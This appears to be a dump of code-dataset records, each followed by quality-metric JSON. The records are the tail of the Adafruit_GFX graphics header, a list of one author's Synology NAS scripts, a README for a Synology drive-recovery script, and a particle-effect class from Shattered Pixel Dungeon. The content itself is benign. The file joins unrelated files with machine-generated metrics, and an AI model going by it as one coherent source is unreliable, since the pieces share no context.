int16_t *minx, int16_t *miny, int16_t *maxx, int16_t *maxy);
const int16_t
WIDTH, HEIGHT; // This is the 'raw' display w/h - never changes
int16_t
_width, _height, // Display w/h as modified by current rotation
cursor_x, cursor_y;
uint16_t
textcolor, textbgcolor;
uint8_t
textsize,
rotation;
boolean
wrap, // If set, 'wrap' text at right edge of display
_cp437; // If set, use correct CP437 charset (default is off)
GFXfont
*gfxFont;
};
class Adafruit_GFX_Button {
public:
Adafruit_GFX_Button(void);
// "Classic" initButton() uses center & size
void initButton(Adafruit_GFX *gfx, int16_t x, int16_t y,
uint16_t w, uint16_t h, uint16_t outline, uint16_t fill,
uint16_t textcolor, char *label, uint8_t textsize);
// New/alt initButton() uses upper-left corner & size
void initButtonUL(Adafruit_GFX *gfx, int16_t x1, int16_t y1,
uint16_t w, uint16_t h, uint16_t outline, uint16_t fill,
uint16_t textcolor, char *label, uint8_t textsize);
void drawButton(boolean inverted = false);
boolean contains(int16_t x, int16_t y);
void press(boolean p);
boolean isPressed();
boolean justPressed();
boolean justReleased();
private:
Adafruit_GFX *_gfx;
int16_t _x1, _y1; // Coordinates of top-left corner
uint16_t _w, _h;
uint8_t _textsize;
uint16_t _outlinecolor, _fillcolor, _textcolor;
char _label[10];
boolean currstate, laststate;
};
class GFXcanvas1 : public Adafruit_GFX {
public:
GFXcanvas1(uint16_t w, uint16_t h);
~GFXcanvas1(void);
void drawPixel(int16_t x, int16_t y, uint16_t color),
fillScreen(uint16_t color);
uint8_t *getBuffer(void);
private:
uint8_t *buffer;
};
class GFXcanvas8 : public Adafruit_GFX {
public:
GFXcanvas8(uint16_t w, uint16_t h);
~GFXcanvas8(void);
void drawPixel(int16_t x, int16_t y, uint16_t color),
fillScreen(uint16_t color),
writeFastHLine(int16_t x, int16_t y, int16_t w, uint16_t color);
uint8_t *getBuffer(void);
private:
uint8_t *buffer;
};
class GFXcanvas16 : public Adafruit_GFX {
public:
GFXcanvas16(uint16_t w, uint16_t h);
~GFXcanvas16(void);
void drawPixel(int16_t x, int16_t y, uint16_t color),
fillScreen(uint16_t color);
uint16_t *getBuffer(void);
private:
uint16_t *buffer;
};
#endif // _ADAFRUIT_GFX_H
| 7,554 | Adafruit_GFX | h | en | c | code | {"qsc_code_num_words": 1228, "qsc_code_num_chars": 7554.0, "qsc_code_mean_word_length": 4.09934853, "qsc_code_frac_words_unique": 0.17345277, "qsc_code_frac_chars_top_2grams": 0.19666269, "qsc_code_frac_chars_top_3grams": 0.04588796, "qsc_code_frac_chars_top_4grams": 0.07866508, "qsc_code_frac_chars_dupe_5grams": 0.5738975, "qsc_code_frac_chars_dupe_6grams": 0.56317044, "qsc_code_frac_chars_dupe_7grams": 0.53118792, "qsc_code_frac_chars_dupe_8grams": 0.52681764, "qsc_code_frac_chars_dupe_9grams": 0.51569329, "qsc_code_frac_chars_dupe_10grams": 0.51052841, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.09385382, "qsc_code_frac_chars_whitespace": 0.20307122, "qsc_code_size_file_byte": 7554.0, "qsc_code_num_lines": 211.0, "qsc_code_num_chars_line_max": 106.0, "qsc_code_num_chars_line_mean": 35.80094787, "qsc_code_frac_chars_alphabet": 0.7423588, "qsc_code_frac_chars_comments": 0.15078104, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.36746988, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00545596, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.20481928, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.25903614, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 1, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
007revad/Synology_Recover_Data | my-other-scripts.md | ## All my scripts, tools and guides
<img src="https://hitscounter.dev/api/hit?url=https%3A%2F%2F007revad.github.io%2F&label=Visitors&icon=github&color=%23198754&message=&style=flat&tz=UTC">
#### Contents
- [Plex](#plex)
- [Synology docker](#synology-docker)
- [Synology recovery](#synology-recovery)
- [Other Synology scripts](#other-synology-scripts)
- [Synology hardware restrictions](#synology-hardware-restrictions)
- [2025 plus models](#2025-plus-models)
- [How To Guides](#how-to-guides)
- [Synology dev](#synology-dev)
***
### Plex
- **<a href="https://github.com/007revad/Synology_Plex_Backup">Synology_Plex_Backup</a>**
- A script to backup Plex to a tgz file foror DSM 7 and DSM 6.
- Works for Plex Synology package and Plex in docker.
- **<a href="https://github.com/007revad/Asustor_Plex_Backup">Asustor_Plex_Backup</a>**
- Backup your Asustor's Plex Media Server settings and database.
- **<a href="https://github.com/007revad/Linux_Plex_Backup">Linux_Plex_Backup</a>**
- Backup your Linux Plex Media Server's settings and database.
- **<a href="https://github.com/007revad/Plex_Server_Sync">Plex_Server_Sync</a>**
- Sync your main Plex server database & metadata to a backup Plex server.
- Works for Synology, Asustor, Linux and supports Plex package or Plex in docker.
[Back to Contents](#contents)
### Synology docker
- **<a href="https://github.com/007revad/Synology_Docker_Export">Synology_Docker_export</a>**
- Export all Synology Container Manager or Docker containers' settings as json files to your docker shared folder.
- **<a href="https://github.com/007revad/Synology_ContainerManager_IPv6">Synology_ContainerManager_IPv6</a>**
- Enable IPv6 for Container Manager's bridge network.
- **<a href="https://github.com/007revad/ContainerManager_for_all_armv8">ContainerManager_for_all_armv8</a>**
- Script to install Container Manager on a RS819, DS119j, DS418, DS418j, DS218, DS218play or DS118.
- **<a href="https://github.com/007revad/Docker_Autocompose">Docker_Autocompose</a>**
- Create .yml files from your docker existing containers.
- **<a href="https://github.com/007revad/Synology_docker_cleanup">Synology_docker_cleanup</a>**
- Remove orphan docker btrfs subvolumes and images in Synology DSM 7 and DSM 6.
[Back to Contents](#contents)
### Synology recovery
- **<a href="https://github.com/007revad/Synology_DSM_reinstall">Synology_DSM_reinstall</a>**
- Easily re-install the same DSM version without losing any data or settings.
- **<a href="https://github.com/007revad/Synology_Recover_Data">Synology_Recover_Data</a>**
- A script to make it easy to recover your data from your Synology's drives using a computer.
- **<a href="https://github.com/007revad/Synology_clear_drive_error">Synology clear drive error</a>**
- Clear drive critical errors so DSM will let you use the drive.
- **<a href="https://github.com/007revad/Synology_DSM_Telnet_Password">Synology_DSM_Telnet_Password</a>**
- Synology DSM Recovery Telnet Password of the Day generator.
- **<a href="https://github.com/007revad/Syno_DSM_Extractor_GUI">Syno_DSM_Extractor_GUI</a>**
- Windows GUI for extracting Synology DSM 7 pat files and spk package files.
- **<a href="https://github.com/007revad/Synoboot_backup">Synoboot_backup</a>**
- Back up synoboot after each DSM update so you can recover from a corrupt USBDOM.
[Back to Contents](#contents)
### Other Synology scripts
- **<a href="https://github.com/007revad/Synology_app_mover">Synology_app_mover</a>**
- Easily move Synology packages from one volume to another volume.
- **<a href="https://github.com/007revad/Video_Station_for_DSM_722">Video_Station_for_DSM_722</a>**
- Script to install Video Station in DSM 7.2.2
- **<a href="https://github.com/007revad/SS_Motion_Detection">SS_Motion_Detection</a>**
- Installs previous Surveillance Station and Advanced Media Extensions versions so motion detection and HEVC are supported.
- **<a href="https://github.com/007revad/Synology_Config_Backup">Synology_Config_Backup</a>**
- Backup and export your Synology DSM configuration.
- **<a href="https://github.com/007revad/Synology_CPU_temperature">Synology_CPU_temperature</a>**
- Get and log Synology NAS CPU temperature via SSH.
- **<a href="https://github.com/007revad/Synology_SMART_info">Synology_SMART_info</a>**
- Show Synology smart test progress or smart health and attributes.
- **<a href="https://github.com/007revad/Synology_Cleanup_Coredumps">Synology_Cleanup_Coredumps</a>**
- Cleanup memory core dumps from crashed processes.
- **<a href="https://github.com/007revad/Synology_toggle_reset_button">Synology_toggle_reset_button</a>**
- Script to disable or enable the reset button and show current setting.
- **<a href="https://github.com/007revad/Synology_Download_Station_Chrome_Extension">Synology_Download_Station_Chrome_Extension</a>**
- Download Station Chrome Extension.
- **<a href="https://github.com/007revad/Seagate_lowCurrentSpinup">Seagate_lowCurrentSpinup</a>**
- This script avoids the need to buy and install a higher wattage power supply when using multiple large Seagate SATA HDDs.
[Back to Contents](#contents)
### Synology hardware restrictions
- **<a href="https://github.com/007revad/Synology_HDD_db">Synology_HDD_db</a>**
- Add your SATA or SAS HDDs and SSDs plus SATA and NVMe M.2 drives to your Synology's compatible drive databases, including your Synology M.2 PCIe card and Expansion Unit databases.
- **<a href="https://github.com/007revad/Synology_enable_M2_volume">Synology_enable_M2_volume</a>**
- Enable creating volumes with non-Synology M.2 drives.
- Enable Health Info for non-Synology NVMe drives (not in DSM 7.2.1 or later).
- **<a href="https://github.com/007revad/Synology_M2_volume">Synology_M2_volume</a>**
- Easily create an M.2 volume on Synology NAS.
- **<a href="https://github.com/007revad/Synology_enable_M2_card">Synology_enable_M2_card</a>**
- Enable Synology M.2 PCIe cards in Synology NAS that don't officially support them.
- **<a href="https://github.com/007revad/Synology_enable_eunit">Synology_enable_eunit</a>**
- Enable an unsupported Synology eSATA Expansion Unit models.
- **<a href="https://github.com/007revad/Synology_enable_Deduplication">Synology_enable_Deduplication</a>**
- Enable deduplication with non-Synology SSDs and unsupported NAS models.
- **<a href="https://github.com/007revad/Synology_SHR_switch">Synology_SHR_switch</a>**
- Easily switch between SHR and RAID Groups, or enable RAID F1.
- **<a href="https://github.com/007revad/Synology_enable_sequential_IO">Synology_enable_sequential_IO</a>**
- Enables sequential I/O for your SSD caches, like DSM 6 had.
- **<a href="https://github.com/007revad/Synology_Information_Wiki">Synology_Information_Wiki</a>**
- Information about Synology hardware.
[Back to Contents](#contents)
### 2025 plus models
- **<a href="https://github.com/007revad/Transcode_for_x25">Transcode_for_x25</a>**
- Installs the modules needed for Plex or Jellyfin hardware transcoding in DS425+ and DS225+.
- **<a href="https://github.com/007revad/Synology_HDD_db/blob/main/2025_plus_models.md">2025 series or later Plus models</a>**
- Unverified 3rd party drive limitations and unofficial solutions.
- **<a href="https://github.com/007revad/Synology_HDD_db/blob/main/2025_plus_models.md#setting-up-a-new-2025-or-later-plus-model-with-only-unverified-hdds">Setup with only 3rd party drives</a>**
- Setting up a new 2025 or later plus model with only unverified HDDs.
- **<a href="https://github.com/007revad/Synology_HDD_db/blob/main/2025_plus_models.md#deleting-and-recreating-your-storage-pool-on-unverified-hdds">Recreating storage pool on migrated drives</a>**
- Deleting and recreating your storage pool on unverified HDDs.
[Back to Contents](#contents)
### How To Guides
- **<a href="https://github.com/007revad/Synology_SSH_key_setup">Synology_SSH_key_setup</a>**
- How to setup SSH key authentication for your Synology.
[Back to Contents](#contents)
### Synology dev
- **<a href="https://github.com/007revad/Download_Synology_Archive">Download_Synology_Archive</a>**
- Download all or part of the Synology archive.
- **<a href="https://github.com/007revad/Syno_DSM_Extractor_GUI">Syno_DSM_Extractor_GUI</a>**
- Windows GUI for extracting Synology DSM 7 pat files and spk package files.
- **<a href="https://github.com/007revad/ScriptNotify">ScriptNotify</a>**
- DSM 7 package to allow your scripts to send DSM notifications.
- **<a href="https://github.com/007revad/DTC_GUI_for_Windows">DTC_GUI_for_Windows</a>**
- GUI for DTC.exe for Windows.
[Back to Contents](#contents)
| 9,099 | my-other-scripts | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.0, "qsc_doc_frac_words_redpajama_stop": 0.16632653, "qsc_doc_num_sentences": 107.0, "qsc_doc_num_words": 1341, "qsc_doc_num_chars": 9099.0, "qsc_doc_num_lines": 180.0, "qsc_doc_mean_word_length": 4.94630872, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.23191648, "qsc_doc_entropy_unigram": 4.76529845, "qsc_doc_frac_words_all_caps": 0.02908163, "qsc_doc_frac_lines_dupe_lines": 0.1025641, "qsc_doc_frac_chars_dupe_lines": 0.10911978, "qsc_doc_frac_chars_top_2grams": 0.05789236, "qsc_doc_frac_chars_top_3grams": 0.06482738, "qsc_doc_frac_chars_top_4grams": 0.10372381, "qsc_doc_frac_chars_dupe_5grams": 0.39981909, "qsc_doc_frac_chars_dupe_6grams": 0.36891301, "qsc_doc_frac_chars_dupe_7grams": 0.34041912, "qsc_doc_frac_chars_dupe_8grams": 0.25569124, "qsc_doc_frac_chars_dupe_9grams": 0.20624152, "qsc_doc_frac_chars_dupe_10grams": 0.15829941, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 30.70731707, "qsc_doc_frac_chars_hyperlink_html_tag": 0.34762062, "qsc_doc_frac_chars_alphabet": 0.79007303, "qsc_doc_frac_chars_digital": 0.03094442, "qsc_doc_frac_chars_whitespace": 0.11210023, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
007revad/Synology_Recover_Data | README.md | # Synology Recover Data
<a href="https://github.com/007revad/Synology_Recover_Data/releases"><img src="https://img.shields.io/github/release/007revad/Synology_Recover_Data.svg"></a>

[](https://www.paypal.com/paypalme/007revad)
[](https://github.com/sponsors/007revad)
[](https://user-badge.committers.top/australia/007revad)
### Description
A script to make it easy to recover your data from your Synology's drives using a computer.
Now supports encrypted volumes.
### Confirmed working on
<details>
<summary>Click here to see list</summary>
| Drive source | DSM version | Btrfs/Ext | Storage Pool type | RAID | Encrypted | Notes |
|--------------|----------------|-----------|-------------------|-------|-----------|-----------------|
| DS720+ | 7.2.1 Update 4 | Btrfs | Multiple Volume | SHR | Volume | Single drive |
| DS720+ | 7.2.1 Update 4 | Btrfs | Multiple Volume | SHR | no | Single drive |
| DS1812+ | 6.2.4 Update 7 | Btrfs | Multiple Volume | SHR | no | Single drive |
| DS1812+ | 6.2.4 Update 7 | Btrfs | Single Volume | Basic | no | **Failed, faulty HDD** |
</details>
### What does the script do?
The script automatically does steps 4 to 15 from this web page: <br>
https://kb.synology.com/en-id/DSM/tutorial/How_can_I_recover_data_from_my_DiskStation_using_a_PC
So you need to do steps 1 to 3 from that web page.
The same environment rules as on Synology's web page apply:
**Applicable to:**
- DSM version 6.2.x and above
- Volumes using the Btrfs or ext4 file systems
- Encrypted volumes using the Btrfs or ext4 file systems
- Ubuntu 19.10 (Eoan Ermine) only (Synology's recommended 18.04 has a bug with persistent partition)
**Not applicable to:**
- Volumes using read-write SSD cache
**Currently the script does NOT support:**
- Encrypted shared folders
At the moment the script only supports mounting 1 volume at a time. You'd need to run the script again to mount a 2nd volume.
### Setup to recover data using a PC
1. Make sure your PC has sufficient drive slots for drive installation (you can use a USB dock).
2. Remove the drives from your Synology NAS and install them in your PC or USB dock. For RAID or SHR configurations, you must install all the drives (excluding hot spare drives) in your PC at the same time.
3. Download the **Desktop image** for [Ubuntu version 19.10 Eoan Ermine](https://old-releases.ubuntu.com/releases/19.10/)
- Synology's recommended 18.04 has a bug with persistent partition so any changes you make in Ubuntu will be lost when you shut down Ubuntu.
- Newer Ubuntu versions like 20.04.6 LTS and 22.04.4 LTS require an 8GB USB drive and install an mdadm version that won't work with DSM's superblock location.
5. You'll need a 4GB or larger USB drive.
6. Prepare a Ubuntu environment by following the instructions in [this tutorial](https://ubuntu.com/tutorials/create-a-usb-stick-on-windows) with 1 exception:
- Set Persistent partition size in [Rufus](https://rufus.ie/en/) to greater than 0 so any changes you make in Ubuntu are saved to the USB drive.
<p align="left"> <img src="/images/rufus.png"></p>
7. If the drives contain an encrytped volume, or volumes:
- Find your [NASNAME]_volume#.rkey for each encrypted volume. e.g. MYNAS_volume1.rkey, DISKSTATION_volume1.rkey or RACKSTATION_volume1.rkey etc.
- Copy the *.rkey file or files to a USB drive or network share.
8. Once Rufus has finished creating the boot drive you can reboot the computer, [enter the BIOS](https://www.tomshardware.com/reviews/bios-keys-to-access-your-firmware,5732.html) and set it to boot from the USB drive, and boot into Ubuntu.
- I highly recommend unplugging the SATA cables from the PC's drives, while the computer is turned off, so you don't accidentially install Ubuntu on them.
9. **IMPORTANT!** When Ubuntu asks if you want to want to "Try Ubuntu" or "Install Ubuntu" select "**Try Ubuntu**".
### Extra steps if the volume is encrypted
After booting into Ubuntu:
1. Plug in the USB drive containing the *.rkey file or files, or browse to the network share where your *.rkey file or files are located.
3. Copy the *.rkey file or files to Home.
### Setup in Ubuntu
1. Open Firefox from the tool bar and go to [https://github.com/007revad/Synology_Recover_Data](https://github.com/007revad/Synology_Recover_Data) or https://tinyurl.com/synorecover and download the latest release's zip file.
2. Open Files from the tool bar and click on Downloads, right-click on the zip file and select Extract.
3. Right-click on the syno_restore_data.sh file and select Properties.
- Click Permissions.
- Tick Allow executing file as program.
<p align="left"> <img src="/images/script-permissions-2.png"></p>
4. Copy syno_recover_data.sh up 1 level to home.
<p align="left"> <img src="/images/home.png"></p>
5. Click on the Show Applications icon on the bottom left of the desktop.
6. Type terminal in the search bar.
7. Right-click on Terminal and click on Save to favorites.
8. Press Esc twice to return to the desktop.
### Running the script
1. Open Terminal from the tool bar.
2. Type `sudo -i /home/ubuntu/syno_recover_data.sh` and press enter.
<p align="left"> <img src="/images/run-script.png"></p>
### Accessing your data
There are 2 ways you can access you data:
- Accessing your volume from the Home folder
<p align="left"> <img src="/images/volume_in_home-2.png"></p>
- Accessing your volume from Media on the tool bar
<p align="left"> <img src="/images/volume_in_media-4.png"></p>
<br>
---
### Screenshots
<p align="left">DSM 7 with 2 storage pools and volumes</p>
<p align="left"> <img src="/images/image-volume_2-2.png"></p>
<br>
<p align="left">DSM 7 SHR single volume</p>
<p align="left"> <img src="/images/image-vg1000-2.png"></p>
<br>
<p align="left">DSM 6 Classic RAID single volume</p>
<p align="left"> <img src="/images/image-md-2.png"></p>
<br>
<p align="left">DSM 7 Encrypted volume</p>
<p align="left"> <img src="/images/image-encrypted-volume-2.png"></p>
| 6,776 | README | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.0, "qsc_doc_frac_words_redpajama_stop": 0.18701608, "qsc_doc_num_sentences": 135.0, "qsc_doc_num_words": 1114, "qsc_doc_num_chars": 6776.0, "qsc_doc_num_lines": 135.0, "qsc_doc_mean_word_length": 4.28096948, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.32315978, "qsc_doc_entropy_unigram": 5.28029477, "qsc_doc_frac_words_all_caps": 0.03097082, "qsc_doc_frac_lines_dupe_lines": 0.04395604, "qsc_doc_frac_chars_dupe_lines": 0.00242682, "qsc_doc_frac_chars_top_2grams": 0.04193751, "qsc_doc_frac_chars_top_3grams": 0.04529251, "qsc_doc_frac_chars_top_4grams": 0.04026001, "qsc_doc_frac_chars_dupe_5grams": 0.25414133, "qsc_doc_frac_chars_dupe_6grams": 0.23401132, "qsc_doc_frac_chars_dupe_7grams": 0.23401132, "qsc_doc_frac_chars_dupe_8grams": 0.15202349, "qsc_doc_frac_chars_dupe_9grams": 0.13231285, "qsc_doc_frac_chars_dupe_10grams": 0.12350598, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 1.0, "qsc_doc_num_chars_sentence_length_mean": 24.1, "qsc_doc_frac_chars_hyperlink_html_tag": 0.24498229, "qsc_doc_frac_chars_alphabet": 0.80567724, "qsc_doc_frac_chars_digital": 0.0299632, "qsc_doc_frac_chars_whitespace": 0.15776269, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Fireball.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.watabou.glwrap.Blending;
import com.watabou.glwrap.Texture;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.Image;
import com.watabou.noosa.particles.Emitter;
import com.watabou.noosa.particles.PixelParticle;
import com.watabou.noosa.ui.Component;
import com.watabou.utils.ColorMath;
import com.watabou.utils.Random;
import com.watabou.utils.RectF;
public class Fireball extends Component {
private static final RectF BLIGHT = new RectF( 0, 0, 0.25f, 1 );
private static final RectF FLIGHT = new RectF( 0.25f, 0, 0.5f, 1 );
private static final RectF FLAME1 = new RectF( 0.50f, 0, 0.75f, 1 );
private static final RectF FLAME2 = new RectF( 0.75f, 0, 1.00f, 1 );
private static final int COLOR = 0xFF66FF;
private Image bLight;
private Image fLight;
private Emitter emitter;
private Group sparks;
@Override
protected void createChildren() {
sparks = new Group();
add( sparks );
bLight = new Image( Assets.FIREBALL );
bLight.frame( BLIGHT );
bLight.origin.set( bLight.width / 2 );
bLight.angularSpeed = -90;
add( bLight );
emitter = new Emitter();
emitter.pour( new Emitter.Factory() {
@Override
public void emit(Emitter emitter, int index, float x, float y) {
Flame p = (Flame)emitter.recycle( Flame.class );
p.reset();
p.heightLimit(Fireball.this.y - 30);
p.x = x - p.width / 2;
p.y = y - p.height / 2;
}
}, 0.1f );
add( emitter );
fLight = new Image( Assets.FIREBALL );
fLight.frame( FLIGHT );
fLight.origin.set( fLight.width / 2 );
fLight.angularSpeed = 360;
add( fLight );
bLight.texture.filter( Texture.LINEAR, Texture.LINEAR );
}
@Override
protected void layout() {
bLight.x = x - bLight.width / 2;
bLight.y = y - bLight.height / 2;
emitter.pos(
x - bLight.width / 4,
y - bLight.height / 4,
bLight.width / 2,
bLight.height / 2 );
fLight.x = x - fLight.width / 2;
fLight.y = y - fLight.height / 2;
}
@Override
public void update() {
super.update();
if (Random.Float() < Game.elapsed) {
PixelParticle spark = (PixelParticle)sparks.recycle( PixelParticle.Shrinking.class );
spark.reset( x, y, ColorMath.random( COLOR, 0x66FF66 ), 2, Random.Float( 0.5f, 1.0f ) );
spark.speed.set(
Random.Float( -40, +40 ),
Random.Float( -60, +20 ) );
spark.acc.set( 0, +80 );
sparks.add( spark );
}
}
@Override
public void draw() {
Blending.setLightMode();
super.draw();
Blending.setNormalMode();
}
public static class Flame extends Image {
private static float LIFESPAN = 1f;
private static float SPEED = -40f;
private static float ACC = -20f;
private float timeLeft;
private float heightLimit;
public Flame() {
super( Assets.FIREBALL );
frame( Random.Int( 2 ) == 0 ? FLAME1 : FLAME2 );
origin.set( width / 2, height / 2 );
acc.set( 0, ACC );
}
public void reset() {
revive();
timeLeft = LIFESPAN;
speed.set( 0, SPEED );
}
public void heightLimit(float limit){
heightLimit = limit;
}
@Override
public void update() {
super.update();
if (y < heightLimit){
y = heightLimit;
speed.set(Random.Float(-20, 20), 0);
acc.set(0, 0);
}
if ((timeLeft -= Game.elapsed) <= 0) {
kill();
} else {
float p = timeLeft / LIFESPAN;
scale.set( p );
alpha( p > 0.8f ? (1 - p) * 5f : p * 1.25f );
}
}
}
}
| 4,360 | Fireball | java | en | java | code | {"qsc_code_num_words": 587, "qsc_code_num_chars": 4360.0, "qsc_code_mean_word_length": 4.87734242, "qsc_code_frac_words_unique": 0.31345826, "qsc_code_frac_chars_top_2grams": 0.03772267, "qsc_code_frac_chars_top_3grams": 0.06147398, "qsc_code_frac_chars_top_4grams": 0.04400978, "qsc_code_frac_chars_dupe_5grams": 0.10059378, "qsc_code_frac_chars_dupe_6grams": 0.04540692, "qsc_code_frac_chars_dupe_7grams": 0.02584701, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03559871, "qsc_code_frac_chars_whitespace": 0.22041284, "qsc_code_size_file_byte": 4360.0, "qsc_code_num_lines": 176.0, "qsc_code_num_chars_line_max": 92.0, "qsc_code_num_chars_line_mean": 24.77272727, "qsc_code_frac_chars_alphabet": 0.80670786, "qsc_code_frac_chars_comments": 0.17912844, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08333333, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00447052, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06666667, "qsc_codejava_score_lines_no_logic": 0.225, "qsc_codejava_frac_words_no_modifier": 0.88888889, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, 